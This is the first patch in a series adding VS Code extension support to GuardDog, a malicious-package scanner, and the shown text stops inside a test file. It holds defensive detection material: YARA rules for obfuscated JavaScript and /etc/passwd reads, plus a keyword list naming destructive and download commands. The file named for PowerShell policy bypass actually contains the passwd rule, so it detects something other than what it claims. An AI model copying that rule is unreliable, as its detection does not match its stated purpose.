From 64d915d682b42a3ee18c785a99b98456a7b2fc09 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Wed, 16 Jul 2025 16:25:52 +0200 Subject: [PATCH 1/7] Add extensions ecosystem support for Guarddog --- README.md | 45 ++- guarddog/analyzer/analyzer.py | 68 ++-- guarddog/analyzer/metadata/__init__.py | 3 + .../analyzer/metadata/extension/__init__.py | 18 ++ .../metadata/extension/empty_information.py | 38 +++ .../extension/suspicious_permissions.py | 108 +++++++ .../extension/suspicious_publisher.py | 59 ++++ guarddog/analyzer/sourcecode/__init__.py | 15 +- .../extension_obfuscator_dot_io.yar | 30 ++ .../extension_powershell_policy_bypass.yar | 13 + ...tension_suspicious_passwd_access_linux.yar | 13 + guarddog/ecosystems.py | 3 + guarddog/reporters/human_readable.py | 2 + guarddog/scanners/__init__.py | 5 + guarddog/scanners/extension_scanner.py | 196 ++++++++++++ .../metadata/test_extension_metadata.py | 291 ++++++++++++++++++ tests/core/test_extension_scanner.py | 126 ++++++++ 17 files changed, 1009 insertions(+), 24 deletions(-) create mode 100644 guarddog/analyzer/metadata/extension/__init__.py create mode 100644 guarddog/analyzer/metadata/extension/empty_information.py create mode 100644 guarddog/analyzer/metadata/extension/suspicious_permissions.py create mode 100644 guarddog/analyzer/metadata/extension/suspicious_publisher.py create mode 100644 guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar create mode 100644 guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar create mode 100644 guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar create mode 100644 guarddog/scanners/extension_scanner.py create mode 100644 tests/analyzer/metadata/test_extension_metadata.py create mode 100644 tests/core/test_extension_scanner.py diff --git a/README.md b/README.md index 14ff9323..c648f122 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,9 @@ GuardDog

-GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages or Go modules. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. +GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages, Go modules, or VSCode extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. -GuardDog can be used to scan local or remote PyPI and npm packages or Go modules using any of the available [heuristics](#heuristics). +GuardDog can be used to scan local or remote PyPI and npm packages, Go modules, or VSCode extensions using any of the available [heuristics](#heuristics). It downloads and scans code from: @@ -16,6 +16,7 @@ It downloads and scans code from: * PyPI: Source files (tar.gz) packages hosted in [PyPI.org](https://pypi.org/) * Go: GoLang source files of repositories hosted in [GitHub.com](https://github.com) * GitHub Actions: Javascript source files of repositories hosted in [GitHub.com](https://github.com) +* VSCode Extensions: Extensions (.vsix) packages hosted in [marketplace.visualstudio.com](https://marketplace.visualstudio.com/) ![GuardDog demo usage](docs/images/demo.png) @@ -78,6 +79,15 @@ guarddog github_action scan DataDog/synthetics-ci-github-action guarddog github_action verify /tmp/repo/.github/workflows/main.yml +# Scan VSCode extensions from the marketplace +guarddog extension scan ms-python.python + +# Scan a specific version of a VSCode extension +guarddog extension scan ms-python.python --version 2023.20.0 + +# Scan a local VSCode extension directory or VSIX archive +guarddog extension scan /tmp/my-extension/ + # Run in debug mode guarddog --log-level debug npm scan express ``` @@ -192,6 +202,37 @@ Source code heuristics: | npm-steganography | Identify when a package retrieves hidden data from an image and executes it | | npm-dll-hijacking | Identifies when a malicious package manipulates a trusted 
application into loading a malicious DLL | | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | + + +### VSCode Extensions + +For VSCode extensions that are implemented in JavaScript/TypeScript, +GuardDog will run the same source code heuristics as for npm packages, plus specialized YARA rules. + +Source code heuristics: + +| **Heuristic** | **Description** | +|:-------------:|:---------------:| +| npm-serialize-environment | Identify when a package serializes 'process.env' to exfiltrate environment variables | +| npm-obfuscation | Identify when a package uses a common obfuscation method often used by malware | +| npm-silent-process-execution | Identify when a package silently executes an executable | +| shady-links | Identify when a package contains an URL to a domain with a suspicious extension | +| npm-exec-base64 | Identify when a package dynamically executes code through 'eval' | +| npm-install-script | Identify when a package has a pre or post-install script automatically running commands | +| npm-steganography | Identify when a package retrieves hidden data from an image and executes it | +| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | +| npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | +| extension_obfuscator_dot_io | Detect usage of obfuscator.io service patterns | +| extension_powershell_policy_bypass | Identify PowerShell execution policy bypass attempts | +| extension_suspicious_passwd_access_linux | Detect suspicious access to Linux password files | + +Metadata heuristics: + +| **Heuristic** | **Description** | +|:-------------:|:---------------:| +| empty_information | Identify extensions with an empty description field | +| suspicious-permissions | Identify extensions with potentially dangerous permissions or suspicious characteristics | +| 
suspicious-publisher | Identify extensions with suspicious publisher verification status and typosquatting | ## Custom Rules diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 4f61512a..6b549fd7 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -95,7 +95,12 @@ def analyze(self, path, info=None, rules=None, name: Optional[str] = None, versi results = metadata_results["results"] | sourcecode_results["results"] errors = metadata_results["errors"] | sourcecode_results["errors"] - return {"issues": issues, "errors": errors, "results": results, "path": path} + output = {"issues": issues, "errors": errors, "results": results, "path": path} + # Including extension info - pending discussion + # if info is not None: + # output["package_info"] = info + + return output def analyze_metadata(self, path: str, info, rules=None, name: Optional[str] = None, version: Optional[str] = None) -> dict: @@ -183,6 +188,11 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: rule_results: defaultdict[dict, list[dict]] = defaultdict(list) + # Define verbose rules that should only show "file-level" triggers + verbose_rules = { + "DETECT_FILE_obfuscator_dot_io", + } + rules_path = { rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yar") for rule_name in all_rules @@ -206,26 +216,46 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: matches = scan_rules.match(scan_file_target_abspath) for m in matches: - for s in m.strings: - for i in s.instances: + rule_name = m.rule + + if rule_name in verbose_rules: + # For verbose rules, we only show that the rule was triggered in the matching file + # We're logging appearances once instead of issue-counting + file_already_reported = any( + finding["location"].startswith(scan_file_target_relpath + ":") + for finding in rule_results[rule_name] + ) + + if not file_already_reported: finding = { - "location": 
f"{scan_file_target_relpath}:{i.offset}", - "code": self.trim_code_snippet(str(i.matched_data)), - 'message': m.meta.get("description", f"{m.rule} rule matched") + "location": f"{scan_file_target_relpath}:1", + "code": f"Rule triggered in file (matches hidden for brevity)", + 'message': m.meta.get("description", f"{rule_name} rule matched") } - - # since yara can match the multiple times in the same file - # leading to finding several times the same word or pattern - # this dedup the matches - if [ - f - for f in rule_results[m.rule] - if finding["code"] == f["code"] - ]: - continue - - issues += len(m.strings) - rule_results[m.rule].append(finding) + issues += 1 + rule_results[rule_name].append(finding) + else: + # For non-verbose rules, show detailed matches as before + for s in m.strings: + for i in s.instances: + finding = { + "location": f"{scan_file_target_relpath}:{i.offset}", + "code": self.trim_code_snippet(str(i.matched_data)), + 'message': m.meta.get("description", f"{rule_name} rule matched") + } + + # since yara can match the multiple times in the same file + # leading to finding several times the same word or pattern + # this dedup the matches + if [ + f + for f in rule_results[rule_name] + if finding["code"] == f["code"] + ]: + continue + + issues += len(m.strings) + rule_results[rule_name].append(finding) except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" diff --git a/guarddog/analyzer/metadata/__init__.py b/guarddog/analyzer/metadata/__init__.py index 0853e650..08f20894 100644 --- a/guarddog/analyzer/metadata/__init__.py +++ b/guarddog/analyzer/metadata/__init__.py @@ -3,6 +3,7 @@ from guarddog.analyzer.metadata.pypi import PYPI_METADATA_RULES from guarddog.analyzer.metadata.go import GO_METADATA_RULES from guarddog.analyzer.metadata.github_action import GITHUB_ACTION_METADATA_RULES +from guarddog.analyzer.metadata.extension import EXTENSION_METADATA_RULES from guarddog.ecosystems import ECOSYSTEM @@ -16,3 +17,5 @@ def 
get_metadata_detectors(ecosystem: ECOSYSTEM) -> dict[str, Detector]: return GO_METADATA_RULES case ECOSYSTEM.GITHUB_ACTION: return GITHUB_ACTION_METADATA_RULES + case ECOSYSTEM.EXTENSION: + return EXTENSION_METADATA_RULES diff --git a/guarddog/analyzer/metadata/extension/__init__.py b/guarddog/analyzer/metadata/extension/__init__.py new file mode 100644 index 00000000..e7703441 --- /dev/null +++ b/guarddog/analyzer/metadata/extension/__init__.py @@ -0,0 +1,18 @@ +from typing import Type + +from guarddog.analyzer.metadata import Detector +from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector +from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector +from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector + +EXTENSION_METADATA_RULES = {} + +classes: list[Type[Detector]] = [ + ExtensionEmptyInfoDetector, + ExtensionSuspiciousPublisherDetector, + ExtensionSuspiciousPermissionsDetector, +] + +for detectorClass in classes: + detectorInstance = detectorClass() # type: ignore + EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance \ No newline at end of file diff --git a/guarddog/analyzer/metadata/extension/empty_information.py b/guarddog/analyzer/metadata/extension/empty_information.py new file mode 100644 index 00000000..2387a3ed --- /dev/null +++ b/guarddog/analyzer/metadata/extension/empty_information.py @@ -0,0 +1,38 @@ +""" Empty Information Detector for Extensions + +Detects if an extension contains an empty description +""" +import logging +from typing import Optional + +from guarddog.analyzer.metadata.empty_information import EmptyInfoDetector + +log = logging.getLogger("guarddog") + + +class ExtensionEmptyInfoDetector(EmptyInfoDetector): + """Detects extensions with empty description information""" + + def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, + version: 
Optional[str] = None) -> tuple[bool, str]: + + log.debug(f"Running extension empty description heuristic on extension {name} version {version}") + + if not package_info or not isinstance(package_info, dict): + return True, "Extension has no package information" + + manifest = package_info.get("manifest", {}) + marketplace = package_info.get("marketplace", {}) + source = package_info.get("source", "unknown") + + return self._detect_with_metadata(manifest, marketplace, source) + + def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, str]: + """Detect empty information with pre-extracted metadata""" + + manifest_description = manifest.get("description", "").strip() + manifest_display_name = manifest.get("displayName", "").strip() + + if not manifest_description and not manifest_display_name: + return True, self.MESSAGE_TEMPLATE % "Extension Marketplace (manifest)" + return False, "" \ No newline at end of file diff --git a/guarddog/analyzer/metadata/extension/suspicious_permissions.py b/guarddog/analyzer/metadata/extension/suspicious_permissions.py new file mode 100644 index 00000000..7ffeefd0 --- /dev/null +++ b/guarddog/analyzer/metadata/extension/suspicious_permissions.py @@ -0,0 +1,108 @@ +from typing import Optional + +from guarddog.analyzer.metadata.detector import Detector + + +class ExtensionSuspiciousPermissionsDetector(Detector): + """Detects extensions with suspicious permissions or capabilities""" + + def __init__(self): + super().__init__( + name="suspicious-permissions", + description="Identify extensions with potentially dangerous permissions or suspicious characteristics" + ) + + def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, Optional[str]]: + + if not package_info or not isinstance(package_info, dict): + return False, None + + manifest = package_info.get("manifest", {}) + marketplace = package_info.get("marketplace", {}) + 
source = package_info.get("source", "unknown") + + return self._detect_with_metadata(manifest, marketplace, source) + + def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, Optional[str]]: + + # Check manifest for suspicious activation events + activation_events = manifest.get("activationEvents", []) + suspicious_activations = [] + + for event in activation_events: + if isinstance(event, str): + # Very broad activation events that could be suspicious + if event == "*": + suspicious_activations.append(event) + elif "onFileSystem:" in event and "*" in event: + suspicious_activations.append(event) + + if suspicious_activations: + return True, f"Extension uses suspicious activation events: {', '.join(suspicious_activations)}" + + # Check for suspicious scripts in manifest + scripts = manifest.get("scripts", {}) + if scripts: + suspicious_script_patterns = ['rm -rf', 'del /s', 'format', 'shutdown', 'curl', 'wget', 'powershell'] + for script_name, script_content in scripts.items(): + if isinstance(script_content, str): + for pattern in suspicious_script_patterns: + if pattern in script_content.lower(): + return True, f"Extension has suspicious script '{script_name}': contains '{pattern}'" + + dependencies = manifest.get("dependencies", {}) + dev_dependencies = manifest.get("devDependencies", {}) + all_deps = {**dependencies, **dev_dependencies} + + # The list is NOT exhaustive, adjust as needed + suspicious_deps = ['child_process', 'fs-extra', 'shelljs', 'node-pty'] + found_suspicious_deps = [dep for dep in all_deps.keys() if any(sus in dep for sus in suspicious_deps)] + + if found_suspicious_deps: + return True, f"Extension uses potentially dangerous dependencies: {', '.join(found_suspicious_deps[:3])}" + + if marketplace and source == "remote": + download_count = marketplace.get("download_count", 0) + # Check if publisher is not verified but has high privileges + publisher_info = marketplace.get("publisher", {}) + if 
isinstance(publisher_info, dict): + flags = publisher_info.get("flags", []) + is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False + is_domain_verified = marketplace.get("publisher_isDomainVerified", False) + + # Suspicious: unverified publisher with low download count + if not is_verified and not is_domain_verified and download_count < 1000: + return True, "Extension from unverified publisher with low download count" + + if flags: + flag_strings = [str(flag).lower() for flag in flags] + suspicious_flag_patterns = ['preview', 'deprecated', 'malware'] # malware might be unnecessary since extensions are swiftly removed from the marketplace + found_suspicious_flags = [flag for flag in flag_strings + if any(pattern in flag for pattern in suspicious_flag_patterns)] + if found_suspicious_flags: + return True, f"Extension has suspicious marketplace flags: {', '.join(found_suspicious_flags)}" + + contributes = manifest.get("contributes", {}) + if contributes: + # Check for dangerous contribution points + if contributes.get("terminal"): + return True, "Extension contributes terminal functionality which could be dangerous" + + if contributes.get("taskDefinitions"): + return True, "Extension contributes task definitions which could execute arbitrary commands" + + # Will add typosquatting checks for most used commands + + # Check categories for suspicious types + categories = manifest.get("categories", []) + if categories: + suspicious_categories = ['debuggers', 'other', 'testing', 'snippets'] + category_strings = [str(cat).lower() for cat in categories] + found_suspicious_cats = [cat for cat in category_strings + if any(sus in cat for sus in suspicious_categories)] + if found_suspicious_cats and len(categories) == 1: + # Only flag if it's the sole category + return True, f"Extension has potentially suspicious sole category: {found_suspicious_cats[0]}" + + return False, None \ No newline at end of file diff --git
a/guarddog/analyzer/metadata/extension/suspicious_publisher.py b/guarddog/analyzer/metadata/extension/suspicious_publisher.py new file mode 100644 index 00000000..7bab15c2 --- /dev/null +++ b/guarddog/analyzer/metadata/extension/suspicious_publisher.py @@ -0,0 +1,59 @@ +from typing import Optional + +from guarddog.analyzer.metadata.detector import Detector + + +class ExtensionSuspiciousPublisherDetector(Detector): + """Detects extensions with suspicious publisher characteristics""" + + def __init__(self): + super().__init__( + name="suspicious-publisher", + description="Identify extensions with suspicious publisher verification status and typosquatting" + ) + + def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, Optional[str]]: + + if not package_info or not isinstance(package_info, dict): + return False, None + + manifest = package_info.get("manifest", {}) + marketplace = package_info.get("marketplace", {}) + source = package_info.get("source", "unknown") + + return self._detect_with_metadata(manifest, marketplace, source, package_info) + + def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str, package_info: dict) -> tuple[bool, Optional[str]]: + """Detect suspicious publisher patterns with pre-extracted metadata""" + + manifest_publisher = manifest.get("publisher", "").strip() + + if not manifest_publisher: + return False, None # Already handled by empty-information detector + + # TODO: Check for typosquatting using the dedicated detector + + verification_info = [] + if marketplace and source == "remote": + publisher_info = marketplace.get("publisher", {}) + + if isinstance(publisher_info, dict): + # Check if publisher is verified (positive information) + flags = publisher_info.get("flags", []) + is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False + + if is_verified: + verification_info.append("Publisher is verified") + 
+ # Check if publisher domain is verified (positive information) + is_domain_verified = marketplace.get("publisher_isDomainVerified", False) + if is_domain_verified: + verification_info.append("Publisher domain is verified") + + # If we have positive verification information, include it in a non-suspicious way + # This doesn't return True (not suspicious) but provides information until more robust heuristics are implemented + if verification_info: + pass + + return False, None \ No newline at end of file diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index 0c47b630..c158549a 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -22,6 +22,7 @@ class SourceCodeRule: id: str file: str description: str + ecosystem: ECOSYSTEM @dataclass @@ -38,7 +39,6 @@ class SempgrepRule(SourceCodeRule): Semgrep rule are language specific Content of rule in yaml format is accessible through rule_content """ - ecosystem: ECOSYSTEM rule_content: dict @@ -54,7 +54,7 @@ def get_sourcecode_rules( for rule in SOURCECODE_RULES: if kind and not isinstance(rule, kind): continue - if not (getattr(rule, "ecosystem", ecosystem) == ecosystem): + if rule.ecosystem != ecosystem: continue yield rule @@ -78,6 +78,7 @@ def get_sourcecode_rules( case "javascript" | "typescript" | "json": ecosystems.add(ECOSYSTEM.NPM) ecosystems.add(ECOSYSTEM.GITHUB_ACTION) + ecosystems.add(ECOSYSTEM.EXTENSION) case "go": ecosystems.add(ECOSYSTEM.GO) case _: @@ -111,9 +112,17 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' + # Default to EXTENSION for general YARA rules (can be adjusted as when other ecosystems are supported) + rule_ecosystem = ECOSYSTEM.EXTENSION + with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) rule_description = "" if match: 
rule_description = match.group(1) - SOURCECODE_RULES.append(YaraRule(id=rule_id, file=file_name, description=rule_description)) + SOURCECODE_RULES.append(YaraRule( + id=rule_id, + file=file_name, + description=rule_description, + ecosystem=rule_ecosystem + )) diff --git a/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar b/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar new file mode 100644 index 00000000..f66cc1a7 --- /dev/null +++ b/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar @@ -0,0 +1,30 @@ +rule DETECT_FILE_obfuscator_dot_io +{ + meta: + + author = "T HAMDOUNI, Datadog" + description = "Detects Javascript code obfuscated with obfuscator.io. Note that although malicious code is often obfuscated, there are legitimate use cases including protecting intellectual property or preventing reverse engineering." + + strings: + $id1 = /(^|[^A-Za-z0-9])_0x[a-f0-9]{4,8}/ ascii + $id2 = /(^|[^A-Za-z0-9])a0_0x[a-f0-9]{4,8}/ ascii + + $rot_push = "['push'](_0x" ascii + $rot_shift = "['shift']()" ascii + $loop1 = /while\s*\(\!\!\[\]\)/ + + $def1 = "Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(" ascii + $def2 = "{}.constructor(\"return this\")(" ascii + $def3 = "{}.constructor(\\x22return\\x20this\\x22)(\\x20)" base64 + + $tok2 = /parseInt\(_0x[a-f0-9]{4,8}\(0x[a-f0-9]+\)\)/ ascii nocase // strong indicator + + condition: + filesize < 5MB and + ( + ( (#id1 + #id2) >= 6 ) or + ( ( $rot_push and $rot_shift ) or $loop1 ) or + ( any of ($def*) or #tok2 > 5 ) + ) + +} diff --git a/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar new file mode 100644 index 00000000..926757a9 --- /dev/null +++ b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar @@ -0,0 +1,13 @@ +rule DETECT_FILE_powershell_policy_bypass +{ + meta: + author = "T HAMDOUNI, Datadog" + credits = "" + description = "Detects suspicious read 
access to /etc/passwd file, which is often targeted by malware for credential harvesting" + + strings: + $cli = /(cat|less|more|head|tail)\s+.{0,100}\/etc\/passwd/ nocase + $read = /(readFile|readFileSync)\(\s*['"]\/etc\/passwd/ nocase + condition: + $cli or $read +} \ No newline at end of file diff --git a/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar new file mode 100644 index 00000000..76ffe20f --- /dev/null +++ b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar @@ -0,0 +1,13 @@ +rule DETECT_FILE_suspicious_passwd_access_linux +{ + meta: + author = "T HAMDOUNI, Datadog" + credits = "" + description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" + + strings: + $cli = /(cat|less|more|head|tail)\s+.{0,100}\/etc\/passwd/ nocase + $read = /(readFile|readFileSync)\(\s*['"]\/etc\/passwd/ nocase + condition: + $cli or $read +} \ No newline at end of file diff --git a/guarddog/ecosystems.py b/guarddog/ecosystems.py index fcd73c73..d4359b7c 100644 --- a/guarddog/ecosystems.py +++ b/guarddog/ecosystems.py @@ -6,6 +6,7 @@ class ECOSYSTEM(Enum): NPM = "npm" GO = "go" GITHUB_ACTION = "github-action" + EXTENSION = "extension" def get_friendly_name(ecosystem: ECOSYSTEM) -> str: @@ -18,5 +19,7 @@ def get_friendly_name(ecosystem: ECOSYSTEM) -> str: return "go" case ECOSYSTEM.GITHUB_ACTION: return "GitHub Action" + case ECOSYSTEM.EXTENSION: + return "Extension" case _: return ecosystem.value diff --git a/guarddog/reporters/human_readable.py b/guarddog/reporters/human_readable.py index 40c71713..2bd35f2b 100644 --- a/guarddog/reporters/human_readable.py +++ b/guarddog/reporters/human_readable.py @@ -44,6 +44,8 @@ def _format_code_line_for_output(code) -> str: num_issues = results.get("issues") lines = [] + package_info = results.get("package_info") + if num_issues == 0: lines.append( 
"Found " diff --git a/guarddog/scanners/__init__.py b/guarddog/scanners/__init__.py index 55627bc7..0b5a41c5 100644 --- a/guarddog/scanners/__init__.py +++ b/guarddog/scanners/__init__.py @@ -8,6 +8,7 @@ from .go_package_scanner import GoModuleScanner from .go_project_scanner import GoDependenciesScanner from .github_action_scanner import GithubActionScanner +from .extension_scanner import ExtensionScanner from .scanner import PackageScanner, ProjectScanner from ..ecosystems import ECOSYSTEM @@ -33,6 +34,8 @@ def get_package_scanner(ecosystem: ECOSYSTEM) -> Optional[PackageScanner]: return GoModuleScanner() case ECOSYSTEM.GITHUB_ACTION: return GithubActionScanner() + case ECOSYSTEM.EXTENSION: + return ExtensionScanner() return None @@ -57,4 +60,6 @@ def get_project_scanner(ecosystem: ECOSYSTEM) -> Optional[ProjectScanner]: return GoDependenciesScanner() case ECOSYSTEM.GITHUB_ACTION: return GitHubActionDependencyScanner() + case ECOSYSTEM.EXTENSION: + return None # we're not including dependency scanning for this PR return None diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py new file mode 100644 index 00000000..9b649fa8 --- /dev/null +++ b/guarddog/scanners/extension_scanner.py @@ -0,0 +1,196 @@ +import json +import logging +import os +import pathlib +import tempfile +import typing +import zipfile + +import requests + +from guarddog.analyzer.analyzer import Analyzer +from guarddog.ecosystems import ECOSYSTEM +from guarddog.scanners.scanner import PackageScanner +from guarddog.utils.archives import safe_extract + +log = logging.getLogger("guarddog") + +MARKETPLACE_URL = "https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery" +MARKETPLACE_HEADERS = { + "Content-Type": "application/json", + "Accept": "application/json;api-version=3.0-preview.1" +} +MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage" + + +class ExtensionScanner(PackageScanner): + def __init__(self) -> None: 
+ super().__init__(Analyzer(ECOSYSTEM.EXTENSION)) + + def download_and_get_package_info(self, directory: str, package_name: str, version=None) -> typing.Tuple[dict, str]: + """ + Downloads a VSCode extension from the marketplace and extracts it + + Args: + directory: Directory to download to + package_name: Extension identifier (publisher.extension format) + version: Specific version or default to latest + + Returns: + Tuple of (extension metadata(manifest and marketplace) info, extracted_path) + """ + marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) + + file_extension = ".vsix" + vsix_path = os.path.join(directory, package_name.replace("/", "-") + file_extension) + extracted_path = vsix_path.removesuffix(file_extension) + + log.debug(f"Downloading VSCode extension from {vsix_url}") + + self.download_compressed(vsix_url, vsix_path, extracted_path) + + manifest_metadata = self._extract_manifest_metadata(extracted_path) + + combined_metadata = { + "marketplace": marketplace_metadata, + "manifest": manifest_metadata, + "source": "remote" + } + + return combined_metadata, extracted_path + + def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: + """Get marketplace metadata and VSIX download URL""" + payload = { + "filters": [ + { + "criteria": [ + { + "filterType": 7, + "value": package_name + } + ] + } + ], + "flags": 958 + } + + response = requests.post(MARKETPLACE_URL, headers=MARKETPLACE_HEADERS, json=payload) + + if response.status_code != 200: + raise Exception(f"Received status code: {response.status_code} from VSCode Marketplace") + + data = response.json() + + if not data.get("results") or not data["results"][0].get("extensions"): + raise Exception(f"Extension {package_name} not found in marketplace") + + extension_info = data["results"][0]["extensions"][0] + versions = extension_info.get("versions", []) + + if not versions: + raise Exception("No 
versions available for this extension") + + target_version = None + if version is None: + # if no version is provided, default to latest + target_version = versions[0] + else: + for v in versions: + if v.get("version") == version: + target_version = v + break + if target_version is None: + raise Exception(f"Version {version} not found for extension") + + # Extract download URL + files = target_version.get("files", []) + vsix_url = None + for file_info in files: + if file_info.get("assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: + vsix_url = file_info.get("source") + break + + if not vsix_url: + raise Exception("No VSIX download link available for this extension") + + # Extract statistics from the statistics array + stats = {stat["statisticName"]: stat["value"] for stat in extension_info.get("statistics", [])} + # ... and the marketplace metadata + # TODO: it might be interesting to add heuristics regarding the rating count and the weightedRating (see the ranking algo hack) + marketplace_metadata = { + "extensionName": extension_info.get("extensionName", ""), + "flags": extension_info.get("flags", []), + "download_count": int(stats.get("downloadCount", 0)), + "publisher": extension_info.get("publisher", {}), + "publisher_flags": extension_info.get("publisher_flags", ""), + "publisher_domain": extension_info.get("domain", ""), + "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), + } + + return marketplace_metadata, vsix_url + + def _extract_manifest_metadata(self, extracted_path: str) -> dict: + """Extract metadata from the extension's package.json manifest""" + + log.debug(f"Starting manifest extraction from: {extracted_path}") + + package_json_path = None + for root, dirs, files in os.walk(extracted_path): + if "package.json" in files: + package_json_path = os.path.join(root, "package.json") + break + + if package_json_path is None: + log.warning(f"No package.json found in {extracted_path}") + return {} + + log.debug(f"Found
package.json at: {package_json_path}") + try: + with open(package_json_path, 'r', encoding='utf-8') as f: + manifest_data = json.load(f) + log.debug(f"Successfully parsed package.json with {len(manifest_data)} keys") + except (json.JSONDecodeError, IOError) as e: + log.warning(f"Failed to read manifest from {package_json_path}: {e}") + return {} + + registered_commands = manifest_data.get("contributes", {}).get("commands", []) + extracted_metadata = { + "name": manifest_data.get("name", ""), + "displayName": manifest_data.get("displayName", ""), + "description": manifest_data.get("description", ""), + "version": manifest_data.get("version", ""), + "publisher": manifest_data.get("publisher", ""), + "repository": manifest_data.get("repository", {}), + "activationEvents": manifest_data.get("activationEvents", []), + "categories": manifest_data.get("categories", []), + "registeredCommands": registered_commands, + } + + log.debug(f"Extracted manifest metadata: {extracted_metadata}") + return extracted_metadata + + + def scan_local(self, path: str, rules=None) -> dict: + """ + Scan a local VSCode extension directory + + Args: + path: Path to extension directory containing package.json + rules: Set of rules to use + + Returns: + Scan results + """ + # Extract manifest metadata from the extension directory + manifest_metadata = self._extract_manifest_metadata(path) + + # For local directory scanning, only use manifest metadata + package_info = { + "marketplace": {}, # Empty for local scans + "manifest": manifest_metadata, + "source": "local" + } + + # Use the analyzer to scan the directory with the package info + return self.analyzer.analyze(path, package_info, rules) diff --git a/tests/analyzer/metadata/test_extension_metadata.py b/tests/analyzer/metadata/test_extension_metadata.py new file mode 100644 index 00000000..b22d74b5 --- /dev/null +++ b/tests/analyzer/metadata/test_extension_metadata.py @@ -0,0 +1,291 @@ +import pytest + +from 
guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector +from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector +from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector + + +class TestExtensionEmptyInfoDetector: + detector = ExtensionEmptyInfoDetector() + + def test_no_package_info(self): + matches, message = self.detector.detect(None) + assert matches + assert "no package information" in message + + def test_empty_manifest(self): + package_info = { + "manifest": { + "name": "test-extension", + "description": "", + "displayName": "" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert "Extension Marketplace (manifest)" in message + + def test_non_empty_manifest_local(self): + package_info = { + "manifest": { + "name": "test-extension", + "description": "A useful extension", + "displayName": "Test Extension" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + +class TestExtensionSuspiciousPermissionsDetector: + detector = ExtensionSuspiciousPermissionsDetector() + + def test_no_package_info(self): + matches, message = self.detector.detect(None) + assert not matches + assert message is None + + def test_wildcard_activation_event(self): + package_info = { + "manifest": { + "activationEvents": ["*"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious activation events" in message + assert "*" in message + + def test_suspicious_filesystem_activation(self): + package_info = { + "manifest": { + "activationEvents": ["onFileSystem:*"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + 
